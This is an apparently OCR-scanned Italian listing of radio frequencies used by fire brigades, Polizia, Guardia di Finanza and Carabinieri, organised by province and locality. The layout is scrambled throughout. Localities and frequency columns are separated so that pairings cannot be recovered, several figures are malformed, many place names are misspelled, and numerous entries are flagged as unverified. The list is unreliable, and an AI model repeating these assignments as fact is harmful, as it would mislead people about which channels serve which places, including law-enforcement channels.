Bondeno 
Cento 
Codigoro 
Portomaggiore 


Firenze 


Firenze (aeroporto Peretola) 
Firenze ovest (località Viadotto indiano) 


Borgo San Lorenzo 
Castelfiorentino 
Empoli 

Figline Valdarno 
Marradi 

Sesto Fiorentino 


Foggia 
Cerignola 
Manfredonia 
San Severo 


Forlì 

Forlì (aeroporto L. Ridolfi) 
Cesena 

Rocca San Casciano 


Frosinone 
Cassino 
Sora 


73.625<>73.750 (simulcast) 73.700 


73.500 73.750 


73.550 73.700 73.850 


73.700<>73.925 (simulcast) 


73.575 73.800 73.950 


73.550 73.775 


73.525 73.675 73.900 


73.550<>73.600 (simulcast) 73.625 (isole Tremiti) 73.650 


73.550 73.625 


73.575 


Genova 73.550<>73.675<>73.750 (simulcast) 73.600 (regionale) 
Genova (aeroporto C Colombo) 

Genova (Sezione Elicotteri) 

Genova (nautica) 

Bolzaneto 

Busalla 

Chiavan 

Moltedo 

Rapallo 


Gorizia 73.625 
Monfalcone 
Ronchi dei Legionari (località aeroporto F. Tomizzi) 


Grosseto 73.675 73.900 
Arcidosso 

Follonica 

Orbetello (località Orto Tellini) 


Imperia 73.550 73.800<>73.950 (simulcast) 73.600 (regionale) 
Bordighera 

Diano Marina 

San Remo 

Ventimiglia 


Isernia 73.525 
Agnone 


La Spezia 73.550 73.700 74.050 73.600 (regionale) 
La Spezia (nautica) 
Sarzana 


Latina 73.575 73.675 73.750 
Aprilia 

Castelforte 

Gaeta 

Terracina 


Lecce 73.500>73.725 (simulcast) 73.550-73.600 (simulcast) 
Gallipoli 

Maglie 

Tricase 


Lecco 73.500 73.600 
Ballano 
Merate 


Livorno 73.500<>73.775 (simulcast) 73.900 
Livorno (nautica) 

Piombino 

Portoferraio 

Portovecchio 


Lodi 73.500 73.950 
Casalpusterlengo 
SantAngelo Lodigiano 


Lucca 73.825 73.900 
Casteinuovo di Garfagnana 
Viareggio 


L'Aquila 
Avezzano 
Castel di Sangro 
Sulmona 
Tagliacozzo 


Macerata 
Camerino 
Civitanova Marche 


Mantova 
Castiglione delle Stiviere 
Suzzara 


Massa 
Aulla 
Carrara 
Pontremoli 


Matera 
Policoro coro 


Messina 

Messina (nautica) 

Lipari (presso Scuole Elementare) 

Milazzo 

SantAgata di Militello (contrada Torre Candela) 
Taormina 


Milano 
Abbiategrasso 

Carate Brianza 
Casale-Bernate Ticino 
Corbetta 

Desio 

Gorgonzola 

Inveruno 

Legnano 

Linate (località aeroporto Forlanini) 
Lissone 

Magenta 

Monza 

Seregno 

Sesto San Giovanni 


Modena 

Carpi 

Fanano (servizio discontinuo) 
Finale Emilia (servizio discontinuo) 
Pavuilo nel Frignano 

San Felice sul Panaro 

Sassuolo 


Napoli 

Napoli (aeroporto Capodichino) 
Napoli (nautica) 

Afragola (località Salicelle) 
Bacoli 

Capri 

Castellammare di Stabia 

Ischia 


73.525 73.750 


73.500 73.600 73.700 


73.600 73.525 73.750 


73.575-73.800 <simulcast> 73.900 


73.850 (da accertare) 73.550-73.600 (simulcast) 


73.600 73.950 


73.500 73.650 73.950 


73.550 73.950 


73.550 73.650 73.925 


Noia 
Pozzuoli 
Secondigliano 


Novara 

Arona 
Borgomanero 
Domodossola 
Romagnano Sesia 
Varallo Ponbia 


Nuoro 
Lanusei 
Macomer 
Siniscola 


Oristano 
Ales 


Padova 


Castelfranco Veneto 


Cittadella 

Este 

Piove di Sacco 
Saonara 


Palermo 


Palermo (distaccamento Nord) 
Palermo (distaccamento Sud) 
Palermo (nautica) 


Corleone 
Partinico 
Petralia Soprana 


Termini Imerese (contrada Bevuto) 


Ustica 


Parma 


Borgo Val di Taro 


Fidenza 


Pavia 
Garlasco 
Mede 
Mortara 
Vigevano 
Voghera 


Perugia 

Assisi 

Città di Castello 
Foligno 

Gubbio 

Norcia 

Spoleto 

Todi 


Pesaro 
Cagli 

Fano 
Novafaltria 
Urbino 


73.575<>73.900 (simulcast) 


73.550 


73.950 


73.650 73.925 


73.800 73 900 


73.550 73.975 


73.500 


73.675 73.700 (fonogrammi) 73.775 73.800 73.925 


73.525 73.600 73.875 73.725 73.950 (simulcast) 


Pescara 
Pescara (aeroporto Liberi) 


Piacenza 
Bobbio Piacentino 
Fiorenzuola d’ Arda 


Pisa 

Pisa (aeroporto San Giusto) 
Cascina 

Pontedera 

Santa Croce Sull’ Arno 
Volterra (località Saline) 


Pistoia 

Borgo a Buggiano 
Montecatini Terme 
Pescia 

San Felice 

San Marcello Pistoiese 


Pordenone 

Maniago 

San Vilo al Tagliamento 
Spilimbergo 


Potenza 
Lauria 
Marsicovetere 
Melfi 


Prato 


Ragusa 
Modica (contrada Serrauccelli) 
Vittoria 


Ravenna 
Faenza 
Lugo 


Reggio Calabria 

Raggio Calabria (aeroporto T. Menniti) 
Melito di Porto Salvo 

Palmi 

Polistena 

Siderno 


Reggio Emilia 
Castelnuovo nè Monti 
Guastalla 


Rieti 
Fara Sabina 


Rimini 
Rimini (aeroporto Miramare) 
Cattolica 


Roma 
Roma (aeroporto Ciampino) 
Roma (aeroporto Fiumicino) 


73.625 73.675 73.750 


73.550 73.875 


73.625<>73.925 (simulcast) 73.900 


73.675 73.700 73.000 


73.950 


73.900 


73.525 73.900 
73.800 73.850 


73.550 73.825<>73.975 (simulcast) 


73.500 73.675 73.700 


73.550 73.950 


73.550 73.575 


73.550 73.625 73.675 


73.600 73.900 


Roma (stazione Fluviale) 
Anzio 

Bracciano 

Civitavecchia (località Porta Tarquinia) 
Colleferro 

Frascati 

Lido di Ostia 

Marino 

Montelibretti 

Palestrina 

Pomezia 

Subiaco 

Tivoli 

Velletri 


Rovigo 
Adria 


Salerno 

Bellizzi (Nucleo Elicotteri) 

Eboli 

Nocera inferiore 

Sala Consilina (strada statale 16) 
Vallo dalla Lucania 

Vecite Santa Caterina 


Sassari 

Alghero (Nucleo Elicotteri - aeroporto Fertilia) 
Olbia (località aeroporto Costa Smeralda) 
Ozieri 

Porto Torres 

Tempio Pausania 


Savona 

(reg.) 

Savona (nautica) 

Albenga 

Cairo Montenotte 

Finale Ligure 

Vado Ligure 

Villanova di Albenga (località aeroporto Gallinara) 


Siena 

Chianciano Terme 

Montalcino (località Osservanza) 
Montepulciano (località Lo Sterro) 
Piancastagnaio 

Poggibonsi 


Siracusa 

Augusta 

Lentini 

Noto 

Palazzolo Acreide 


Sondrio 

Bormio 

Chiavenna 

Morbegno 

Tirano (magazzeno deposito) 


73.650 73.675 


73.500 


73.575 73.850 


73.525<>73.875<>73.950 (simulcast) 73.550 73.600 


73.750<>73.775 (simulcast) 73.900 


73.600 73.800 73.925 


73.525 73.850 


Taranto 

Taranto (nautica) 
Castellaneta 
Manduria 


Teramo 
Nereto 
Roseto degli Abruzzi 


Terni 
Amelia 
Orvieto Scalo 


Torino 

Almese 

Alpignano 

Carmagnola 

Chivasso 

Caselle (località aeroporto) 
Caselle (Nucleo Elicotteri) 
Condove 

Glaveno 

Grugliasco 

Ivrea 

Lanzo Torinese 

Luserna San Giovanni 
Pinerolo 

Riva di Chiari (volontari) 
Rivalta 

Rivoli 

San Maurizio Canavese (Nucleo Elicotteri) 
San Mauro Torinese 

Sant’ Antonino di Susa (autorimessa) 
Santena 

Susa 

Torre Pellice 

Venaria Reale 

Vinovo 


Trapani 

Trapani (aeroporto Birgi) 
Trapani (nautica) 

Alcamo 

Castelvetrano 

Marsala 

Mazara del Vallo 

Pantelleria (località Aeroporto) 


73.550<>73.600 (simulcast) 


73.750 73.850 73.900 


73.625 73.800 73.975 


73.550 73.800 (simulcast) 73.850 73.650 Ivrea 


73.800 73.950 


Trento 73.500 73.575 73.625 73.700 73.725 73.775 
Cavalese 

Trento (Nucleo Elicotteri) 

Arco 

Borgo Vai Sugana SONO RIPORTATI I PRINCIPALI DISTACCAMENTI 


Canazei di Fassa 

Castello Molina di Fiemme 

Cavalese 

Fiera di Primiero (volontari) 

Fondo in Val di Non 

Levico Terme 

Madonna di Campiglio (località Pinzolo) 
Malè 

Mezzano di Primiero 


OPERANTI NELLA PROVINCIA 


Pergine Valsugana 

Predazzo 

Rovereto Trentino 

San Martino di Castrozza (magazzeno) 


Treviso 

Treviso (aeroporto SantAngelo) 
Asolo (presso Biblioteca) (volontari) 
Castelfranco Veneto 

Conegliano 

Mogliano Veneto 

Montebelluna 

Motta di Livenza 

Vittorio Veneto 


Trieste 

Muggia 

Punto Franco Vecchio 
Villa Opicina 


Udine 

Latisana 

Cervignano del Friuli 
Gemona del Friuli 
Lignano Sabbiadoro 
Pontebba 

San Daniele del Friuli 
Spilimbergo 

Tarvisio 

Tolmezzo 


Varese 

Busto Arsizio 

Gallarate 

Luino 

Malpensa (località aeroporto) 
Saronno 

Somma Lombardo 


Venezia 

Venezia (aeroporto Tessera) 
Venezia (Nucleo Elicotteri) 
Venezia lido 

Cavarzere 

Chioggia 

Jasolo lido 

Marghera (nautica) 

Mestre (località Favorita) 
Mira (località Oriago) 
Mirano 

Noale 

Portogruaro 

San Donà di Piave 


Verbania 

Baceno 

Gravellona Toce (posto di vigilanza) 
Macugnaga 

Omegna 

Santa Maria Maggiore 

Stresa 

Varzo 


73.600 73.650 


73.525 73.650 


73.500 73.675 73.700 73.750 


73.500 73.625 


73.575 73.650 73.900 


73.575<>73.900 (simulcast) 


Villadossola 


Vercelli 73.575<>73.725<>73.750<>74.087,5 (simulcast) 
Alagna Valsesia (frazione Centro) (volontari) 

Borgosesia 

Ponzone 

Santhià 

Varallo Sesia (strada statale 299) 


Verona 73.550 73.650 73.750 
Bardolino 

Dossobuono (aeroporto Villafranca) 

Legnago 


Vibo Valentia 73.550 73.700 


Vicenza 73.800 73.900 
Arzignano 

Asiago 

Bassano del Grappa 

Lonigo 

Schio 

Thiene 


Viterbo 73.525 73.575 


Civile Castellana 
Tuscania 


CANALIZZAZIONE APPARATI UHE 
L’utilizzazione avviene a livello provinciale - da verificare assegnazione per ogni bacino d'utenza 


434.650 434.812,5 442.075 442.125 442.250. 442.275 442.425 442825 MHz 


PRONTO INTERVENTO - POLIZIA 


BANDA 76-79 MHz 


LINK MASTER UHF - LIMITI DI BANDA 434-435 443-444 444-445 MHz 


( limiti di banda 444 - 445 MHz vengono utilizzati solo in alcune regioni) 


VENGONO RIPORTATE LE PROVINCIE E LOCALITA’ DISPONIBILI 


LOCALITA’ 


Acerra 

Adria 
Afragola 
Agrigento 
Alassio 
Albano Laziale 
Alcamo 
Alessandria 
Alghero 
Ancona 
Andria 
Anzio 

Aosta 
Arezzo 
Ariano Irpino 
Arona 

Ascoli Piceno 
Assisi 

Asti 

Atri 

Augusta 
Avellino 
Aversa 
Avezzano 
Avola 
Bercellona Pozzo di Gotto 
Bari 

Barletta 
Bassano del Grappa 
Battipaglia 
Belluno 
Benevento 
Bergamo 
Biella 
Bitonto 
Bizzarrone 
Bologna 
Bolzano 
Bovalino 

Brà 

Brennero 
Brescia 
Bressanone 
Brindisi 
Brogeda 
Busto Arsizio 
Cagliari 


PROV 


NA 
RO 
NA 


SV 
RM 
TP 


SS 


BA 
RM 


AV 
NO 


PG 


TE 
SR 


CE 
AQ 
SR 
ME 


BA 
VI 
SA 


CO 
VA 


FREQUENZE 


79.150 
77.875 
79.150 
78.000 
78.575 
77.950 
78 825 
76.700 
77.050 
77.450 
78.325 
77.950 
77.850 
77.900 
77.875 
78.975 
78.250 
77.875 
79.050 
77.575 
76.775 
78.800 
78.150 
77.575 
76.775 
79.075 
77.200 
78.325 
78.175 
78.950 
77.475 
78.775 
77.750 
78.800 
78.325 
77.425 
77.450 
77.450 
78.700 
78.825 
77.550 
78.725 
77.400 
77.150 
77.425 
78.250 
78.525 


78 275 

79.125 (da verificare) 
77.675 78.475 
77.525 78.575 79.175 


79.125 (entrambe da verificare) 
79.100 


77.650 


77.700 


77.325 77.375 77.650 78.100 76.200 78.325 


78.700 

78.250 

(da verificare) 

77.550 78.075 78.150 78.600 79.075 
77.475 77.550 

(da verificare) 

77.750 (entrambe da verificare) 

77.650 


(da verificare) 


(da verificare) 79.025 


Cairo Montenotte 
Caltanissetta 
Campobasso 
Canicatti 

Canosa di Puglia 
Capo d’Orlando 
Capri 

Capua 

Carpi 

Carrara 

Casa Possa 
Casale Monferrato 
Caserta 

Cessino 

Castel Gandolfo 


Castellammare del Golfo 
Castellammare di Stabia 


Castelvetrano 
Castelvolturno 
Catania 
Catanzaro 

Cava dei Tirreni 
Cavalese 
Cecina 

Cefalù 
Cerignola 
Cervinara 
Cesena 
Chiavari 

Chieti 

Chioggia 

Chiusi 

Cinisello Balsamo 
Cisterna 

Città di Castello 
Cittanova 
Cividale del Friuli 
Civitanova Marche 
Civitavecchia 
Colleferro 
Comiso 

Como 
Condofuri 
Corato 

Cortina d’ Ampezzo 
Courmayeur 
Cremo 
Cremona 

Cuneo 
Domodossola 
Duino 

Empoli 

Enna 

Fabriano 
Faenza 
Falconara 

Fano 

Farfa Sabina 
Fermo 

Fernetti 

Ferrara 

Firenze 


77.200 
79.150 
77.475 
77.700 
78 325 
79.075 
79.175 
78.150 
77.500 
77.475 
78.050 
78.050 
78.175 
77.350 
77.200 
78.825 
79.175 
78.825 
78.150 
77.975 
78.675 
78.950 
77.600 
79.025 
78.875 
78.125 
77.875 
77.850 
79.100 
77.575 
78.625 
77.925 
78.700 
75.925 
77.875 
78.700 
78.075 
78.925 
77.950 
77.950 
79.100 
78.600 
78.700 
78.325 
77.550 
78.900 
77.875 
77.875 
78.150 
77.200 
77.075 
77.550 
79.000 
78.575 
77.950 
77.150 
78.550 
77.475 
78.250 
77.550 
78.200 
77.550 


77.750 
78.000 (da verificare) 


78.525 


(da verificare) 


78.175 79.150 


78.050 


79.125 (entrambe da verificare) 
79.125 (entrambe da verificare) 


77.950 


78.575 


77.800 (da verificare) 


78.500 78.525 79.175 


Fiuggi 
Fiumicino 
Foggia 

Foligno 

Fondi 

Forlì 

Formia 

Forte dei Marmi 
Frascati 
Frattamaggiore 
Fregene 
Frosinone 
Gaeta 

Galatina 
Gallarate 
Gallipoli 
Gavoi 

Gela 

Genova 


Genzano di Roma 
Gioia Tauro 


Giugliano in Campania 


Giulianova 
Gorizia 

Gradisca d’Isonzo 
Grado 

Gravina di Puglia 
Grosseto 
Grottaglie 

Imola 

Imperia 

Ischia 

Isernia 

Ivrea 

Jesi 

Jesolo Lido 

La Spezia 
Lamezia Terme 
Lanciano 
Lanusei 

Latina 

Lauro di Nola 
Lecce 

Lecco 

Legnano 

Lentini 

Licata 

Lignano Sabbiadoro 
Livorno 

Locri 

Lodi 

Lucca 

Lucera 

Lugo di Ravenna 
Luino 

L’Aquila 
Macerata 
Macomer 
Maddaloni 
Malles Venosta 
Malpensa 


FR 
RM 


77.350 
77.950 
78.125 
77875 
76.925 
77.650 
76 925 
78.650 
77.950 
79.150 
77.950 
77 350 
76.925 
78.225 
78.250 
78.225 
78.700 
78.950 
77.275 
78.950 
77.950 
78.700 
79.150 
77.650 
78.050 
78.050 
78.050 
78.300 


78.025 
79.075 
78.975 
79.150 
77.475 
77.650 
78.575 
78.625 
78.725 
79.150 
77.575 
78.700 
76.925 
77.875 
78.225 
78.575 
78.700 
76.775 
77.700 
78.050 
78.100 
78.700 
78.750 
77.225 
78.125 
77.950 
78.250 
77700 
78 925 
78.700 
78 150 
77.400 
77.625 


79.125 (entrambe da verificare) 
79.050 


(da verificare) 
(da verificare) 
79.125 (entrambe da verificare) 
79.125 (entrambe da verificare) 


(da verificare) 
(da verificare) 


77.675 77.975 78.550 78.600 78.650 78.825 
78.975 79.075 79.150 
79.125 (entrambe da verificare) 


77.825 
78.275 


77.525 


79.125 


78.050 


79.050 


79.025 


(da verificare) 


77.750 (entrambe da verificare) 
78.250 


Manduria 
Manfredonia 
Mantova 
Marano 
Marghera 
Marina di Massa 
Marino 
Marsala 
Martina Franca 
Massa 

Matera 
Marzara del Vallo 
Melfi 

Merano 
Mesagne 
Messina 
Mestre 

Milano 
Milazzo 
Mirandola 
Modena 
Modica 

Moena 

Mola 

Molfetta 
Mondragone 
Monfalcone 
Monopoli 
Montecatini Terme 
Montevarchi 
Monza 
Mortara 
Muggia 

Napoli 


Nardò 
Niscemi 
Nocera Inferiore 
Nola 

Noto 
Novara 
Novi Ligure 
Nuoro 

Olbia 
Omegna 
Opicina 
Orgosolo 
Orlo al Serio 
Osimo 

Ostia 

Ostuni 
Ottana 
Ozieri 
Pachino 
Padova 
Palermo 
Palma di Montichiaro 
Palmi 

Parma 

Patti 

Pavia 
Perugia 


78.025 
78.125 
76.850 
79.150 
78.825 
77.850 
77.950 
78.825 
78.025 
77.475 
77.625 
78.825 
77.100 
77.400 
78.050 
77.725 
77.975 
76.850 
79.100 
77.500 
77.500 
79.100 
77.950 
78.300 
78.325 
78.150 
78.050 
78.300 
77.725 
77.900 
78.700 
77.975 
77.075 
76.725 
77.950 
78.225 
78.950 
78.950 
79.175 
76.775 
78.300 
77.200 
78.625 
78.175 
78.975 
77.075 
78.700 
76.700 
78.575 
77.950 
78.050 
78.700 
78.175 
76.775 
77.450 
77.475 
77.700 
78.700 
77.650 
79.100 
78.225 
79.150 


78.275 


78.850 
79.125 
78.275 
78.525 
77.850 
77.750 
78.675 


78.825 
77.925 


78.475 


77.350 
78.025 


78.950 


77.550 


79.125 


77.850 
77.925 
78.000 


79.175 


(entrambe da verificare) 


(entrambe da verificare) 


78.725 79.150 
78.850 
78.000 78.275 78.325 78.500 78.675 79.075 


77.650 77.700 
78.225 78.275 


(entrambe da verificare) 


77.975 78.800 78.850 78.900 
78.100 78.200 78.275 78.575 
(da verificare) 


Pesaro 

Pescara 
Peschiera del Garda 
Pescia 

Pese 

Piacenza 
Piombino 

Pisa 

Pisticci 

Pistoia 
Poggibonsi 
Polistena 
Pompei 

Ponte Chiasso 
Ponte Tresa . 
Pontedera 
Ponticelli 
Pordenone 
Portici 

Porto Ceresio 
Porto Cervo 
Porto Empedocle 
Porto Tolle 
Porto Torres 
Portoferraio 
Portogruaro 
Potenza 
Pozzuoli 

Prato 

Pre 

Priolo 

Quinto al Mare 
Ragusa 
Rapallo 
Ravenna 
Reggio Calabria 
Reggio Emilia 
Riccione 

Rieti 

Rimini 

Riva del Garda 
Rivoli 

Roma 


Ronchi dei Legionari 
Rosignano Marittimo 
Rosignano Solvay 
Rovereto Trentino 
Rovigo 

Saint Vincent 
Salerno 


San Benedetto del Tronto 


San Candido 


San Giorgio a Cremano 
San Giovanni in Persiceto 
San Giuseppe Vesuviano 


San Remo 
San Sabba 
San Sepolcro 
San Severo 


Santa Maria Capua a Vetere 


VR 
PT 
TS 


LI 


MT 


SI 

RC 
NA 
CO 
VA 
PI 

NA 


NA 
VA 
SS 
AG 
RO 
SS 
LI 
VE 


NA 


GE 
SR 
GE 


GE 


FO 


TN 
TO 


GO 
LI 
LI 
TN 


AO 


AP 
BZ 
NA 
BO 
NA 
IM 
TS 
AR 
FG 
CE 


78.550 
77.850 
77.450 
77.725 
77.550 
77.400 
79.025 
78.500 
77.850 
77.725 
77.925 
78.700 
79.175 
77.125 
78.250 
77.975 
79.150 
77.725 
79.175 
78.250 
78.175 
77.700 
77.675 
78.175 
79.025 
78.625 
77.100 
79.150 
77.600 
79.075 
76.775 
79.075 
77.925 
78.950 
77.950 
76.700 
77.450 
77.650 
77.475 
77.650 
78.475 
78.775 
76.825 
78.100 
78.850 
78.050 
79.025 
79.025 
78.475 
77.875 
77.850 
78 075 
78.250 
77.550 
79.175 
79.075 
79.175 
78.975 
77.075 
77.900 
78.125 
78.150 


77.450 


78.525 


(da verificare) 


(da verificare) 


(da verificare) 


77.800 
78.050 


77.800 


77.450 
78.150 
78.900 


79.100 


77.625 77.825 78.925 


(entrambe da veriticare) 


77.200 77.400 77.950 78.075 
78.475 78.525 78.675 78.775 
79.000 79.125 79.175 


Senta Teresa di Gallura SS 78.175 


SantAgata di Militello ME 79.100 

SantAndrea GO 78.050 

SantAngelo dei Lombardi AV 77.875 

Sarno SA 78.950 

Sarzana SP 78.800 

Sassari 76.960 78.325 

Sassuolo MO 77 500 

Savona 77.775 76.025 78.550 78.875 

Sciacca AG 77.700 

Senigallia AN 77.550 78.575 

Serra San Bruno CZ 79.150 

Sessa Aurunca CE 78.150 

Sesto Fiorentino FI 77.550 

Sesto San Giovanni MI 78.700 

Sestri Levante GE 78.550 (da verificare) 

Siderno Marina RC 78.700 

Siena 77.925 78.600 (da verificare) 

Siniscola NU 78.700 

Siracusa 79.025 79.150 

Sondrio 78.500 

Sora FR 77.350 (da verificare) 

Sorrento NA 79.175 

Spoleto PG 77.875 

Sulmona AQ 77.575 77.700 

Taormina ME 79.075 

Taranto 78.025 78.275 78.725 79.050 

Tarvisio UD 77.300 78.075 (entrambe da verificare) 

Taurianova RC 77.775 77.800 

Tempio Pausania SS 77.050 

Teramo 77.575 77.650 

Termini merese PA 78.875 

Termoli CB 77.475 77.775 

Torni 79.175 

Terracina LT 76.925 (da verificare) 

Tirano SO 78.500 

Tivoli RM 77.950 79.125 (entrambe da verificare) 

Tolmezzo UD 77.950 78.075 (entrambe da verificare) 

Torino 76.700 77.325 77.925 77.975 78.125 78.475 78.575 
78.650 78.675 78.750 78.850 78.875 79.025 79.125 

Torre Annunziata NA 79.175 

Torre del Greco NA 79.175 

Tortolì NU 78.700 

Tortorici ME 79.075 

Traforo Monte Bianco AO 78.850 (da verificare) 

Trani BA 78.325 

Trapani 78.275 78.825 

Trento 78.475 

Treviglio BG 78.250 

Treviso 78.275 

Trieste 77.075 77.100 77.550 77.600 77.625 77.650 77.850 

Udine 77.525 

Urbino PS 78.550 

Varese 78.200 

Vasto CH 77.575 78.050 

Velletri RM 77.950 79.125 (entrambe da verificare) 

Venezia 77.525 77.975 78.825 78.850 79.175 

Ventimiglia IM 78.850 78.975 

Verbania-Pallanza 78.975 

Vercelli 77.850 

Verona 77.825 77.975 


Viareggio LU 78.625 


Vibo Valentia 
Vicenza 

Vigevano 

Villa San Giovanni 
Viterbo 

Vittoria 

Voghera 

Volterra 


79.150 
77.450 
77.975 
78.700 
78.875 
79.100 
77.975 
77.975 


78.175 


78.925 


(da verificare) 


PRONTO INTERVENTO - G.d.F. 
BANDA 152 - 154.5 MHz 


LINK MASTER UHF - LIMITI DI BANDA 429 - 429.975 MHz 


L'ASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AVVIENE A LIVELLO REGIONALE 
PER OGNI BACINO DI UTENZA 


152.300 153.500 
152.325 153.525 
152.350 153.550 
152.375 153.575 
152.400 153.600 
152.425 153.625 
152.450 153.650 
152.475 153.675 
152.500 153.700 
152.525 153.725 
152.550 153.750 
152.575 153.775 
152.600 153.800 
152.625 153.825 
152.650 153.850 
152.675 153.875 
152.700 153.900 
152.725 153.925 
152.750 153.950 
152.775 153.975 
152.800 154.000 
152.825 154.025 
152.850 154.050 
152.875 154.075 
152.900 154.100 
152.925 154.125 
152.950 154.150 
152.975 154.175 
153.000 154.200 
153.025 154.225 
153.050 154.250 
153.075 154.275 
153.100 154.300 
153.125 154.325 
153.150 154.350 
153.175 154.375 
153.200 154.400 
153.225 154.425 
153.250 154.450 
153.275 154.475 
153.300 154.500 
153.325 

153.350 

153 375 

153.400 

153.425 

153.450 


153.475 


PRONTO INTERVENTO - CARABINIERI 


BANDA 424 - 427 MHz 


PER OGNI PROVINCIA VENGONO RIPORTATE LE PRINCIPALI LOCALITA DIPENDENTI 


PROVINCIE E LOCALITA’ 


Agrigento 
Cammarata 
Canicattì 
Licata 
Sciacca 


Alessandria 
Acqui Terme 
Casale Monferrato 
Novi Ligure 
Tortona 


Ancona 
Fabriano 
Jesi 
Osimo 
Senigallia 


Aosta 
Chatilìion-Saint Vincent 


Arezzo 

Bibbiena 

Cortona 

San Giovanni Valdarno 
San Sepolcro 


Ascoli Piceno 

Fermo 

Montegiorgio 

San Benedetto del Tronto 


Asti 
Canelli 


Avellino 

Ariano Irpino 

Baleno 

Mirabella Eclano 
Montella 

Sant'Angelo dei Lombardi 


Bari 
Altamura 
Andria 
Barletta 
Molfetta 
Monopoli 
Trani 


FREQUENZE 


425.550 425.925 


425.900 426.050 


426.250 426.550 


425.175 


425.250 


426.250 


426.550 


425.025 425.100 


426.400 426.450 


425.375 425.650 


425.025 425.100 


426.100 


426.125 


425.350 


425.475 


426.775 


425.200 


426.725 


425.700 


425.200 


426.225 


426.300 


425.425 


425.525 


426.875 


425.500 


426.825 


425.775 


425.500 


426.425 


426.950 


425.825 


425.850 


426.925 


425.625 


426.975 


426.150 


425.625 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


Belluno 
Cortina d'Ampezzo 
Feltre 


Benevento 

Cerreto Sannita 
Montesarchio 

San Bartolomeo in Galdo 


Bergamo 

Clusone 

Orio al Serio (aeroporto) 
Treviglio 

Zogno 


Biella 


Bologna 

Imola 

Medicina 

Molinella 

San Giovanni in Persiceto 
Vergato 


Bolzano 
Bressanone 
Brunico 
Egna 
Merano 
Ortisei 

San Candido 
Silandro 
Vipiteno 


Brescia 

Breno 

Chiari 

Desenzano 

Gardone Val Trompia 
Ghedi (aeroporto) 
Salò 

Verolanuova 


Brindisi 
Francavilla Fontana 
Fasano 


Cagliari 
Carbonia 
Dolianova 
Iglesias 

Quartu Sant'Elena 
Sanluri 

Villacidro 


Caltanissetta 
Gela 
Mussumeli 


Campobasso 
Larino 
Termali 


425.375 


425.175 


425.950 


425.400 


425.550 


425.275 


426.400 


425.000 


425.800 


426.250 


426.350 


425.650 


425.250 


426.200 


426.000 


425.925 


425.325 


426.450 


425.050 


425.675 


426.550 


426.625 


425.700 


425.475 


426.325 


426.100 


425.400 


426.725 


425.150 


426.275 


426.775 


426.675 


425.775 


425.525 


426.800 


426.225 


425.575 


426.625 


425.600 


426.375 


426.875 


426.750 


426.150 


425.850 


426.900 


426.425 


425.725 


426.975 


425.675 


426.600 


426.925 


426.650 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


Caserta 

Aversa 

Capua 

Maddaloni 
Mondragone 
Piedimonte Matese 


Santa Maria Capua Vetere 


Catania 

Acireale 
Caltagirone 

Giarre 

Gravina di Catania 
Paternò 

Randazzo 

Vizzini 


Catanzaro 
Lamezia Terme 
Serra San Bruno 
Soverato 
Tropea 


Chieti 
Atessa 
Lanciano 
Ortona 
Vasto 


Como 
Cantù 
Menaggio 


Cosenza 

Castrovillari 
Corigliano Calabro 
Paola 

Rogliano 

Rossano 

San Marco Argentano 
Scalea 


Cremona 
Casalmaggiore 
Crema 


Crotone 
Marina 


Cuneo 

Alba 

Borgo San Dalmazzo 
Brà 

Fossano 

Mondovi 

Saluzzo 

Savigliano 


Enna 
Nicosia 
Piazza Armerina 


425.550 


425.025 


426.350 


425.950 


425.375 


426.400 


426.250 


425.175 


425.375 


425.175 


425.925 


425.100 


426.625 


426.200 


425.650 


426.450 


426.560 


425.250 


425.650 


425.250 


426.100 


425.200 


426.675 


426.325 


425.700 


426.725 


425.350 


425.475 


425.700 


425.475 


426.225 


425.500 


426.750 


426.600 


425.775 


426.825 


425.425 


425.525 


425.775 


425.525 


426.425 


425.625 


426.850 


426.900 


426.150 


426.975 


425.825 


425.850 


426.150 


425.850 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


Cirò 


Ferrara 
Cento 
Comacchio 
Copparo 
Portomaggiore 


Firenze 

Borgo San Lorenzo 
Empoli 

Figline Valdarno 
Pontassieve 

Signa 


Foggia 

Cerignola 

Lucera 
Manfredonia 

San Severo 

Vico del Gargano 


Forlì 
Cesena 
Meldola 


Frosinone 
Alatri 
Anagni 
Cassino 
Pontecorvo 
Sora 


Genova 

Chiavari 

Sampierdarena 

Santa Margherita Ligure 
Sestri Levante 


Gorizia 

Cormons 
Gradisca d'Isonzo 
Monfalcone 


Grosseto 
Arcidosso 
Massa Marittima 
Orbetallo 
Pitigliano 
Sorano 


Imperia 
Bordighera 
San Remo 
Ventimiglia 


Isernia 
Agnone 


Le Spezia 
Sarzana 


425.275 


425.275 


425.275 


425.375 


425.000 


426.350 


426.400 


425.800 


425.950 


426.400 


426.250 


425.325 


425.325 


425.325 


425.650 


425.050 


426.625 


426.450 


425.675 


426.200 


426.450 


426.550 


425.400 


425.400 


425.400 


425.700 


425.150 


426.675 


426.725 


426.275 


426.325 


426.725 


425.350 


425.575 


425.575 


425.575 


425.775 


425.500 


426.750 


426.625 


426.375 


426.600 


426.825 


425.425 


425.725 


425.725 


425.725 


426.150 


425.675 


426.850 


426.975 


426.600 


426.900 


426.975 


425.825 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426 000 


426.000 


426.000 


Latina 
Aprilia 
Formia 
Gaeta 
Terracina 


Lecce 
Casarano 
Gallipoli 
Maglie 
Tricase 


Lecco 


Livorno 
Cecina 
Piombino 
Portoferraio 


Lodi 
Codogno 


Lucca 
Castelnuovo di Garfagnana 
Viareggio 


L’Aquila 
Avezzano 
Castei di Sangro 
Sulmona 
Tagliacozzo 


Macerata 
Camerino 
Civitanova Marche 
Tolentino 


Mantova 
Gonzaga 
Viadana 


Massa 
Carrara 
Pontremoli 


Matera 
Pisticci 
Policoro 
Tricarico 


Messina 

Messina Sud (loc. Tremestieri) 
Barcellona Pozzo di Gotto 
Milazzo 

Mistretta 

Patti 

Sant'Agata di Militello 

Santo Stefano di Camastra 
Taormina 


Milano 
Milano (aeroporto) 


425.025 


425.450 


425.175 


425.550 


425.025 


425.025 


425.900 


425.000 


426.350 


425.000 


425.950 


425.000 


425.100 


425.750 


425.250 


425.925 


425.100 


425.100 


426.050 


425.050 


426.625 


425.050 


426.200 


425.050 


425.200 


426.175 


425.475 


426.100 


425.200 


425.200 


426.125 


425.150 


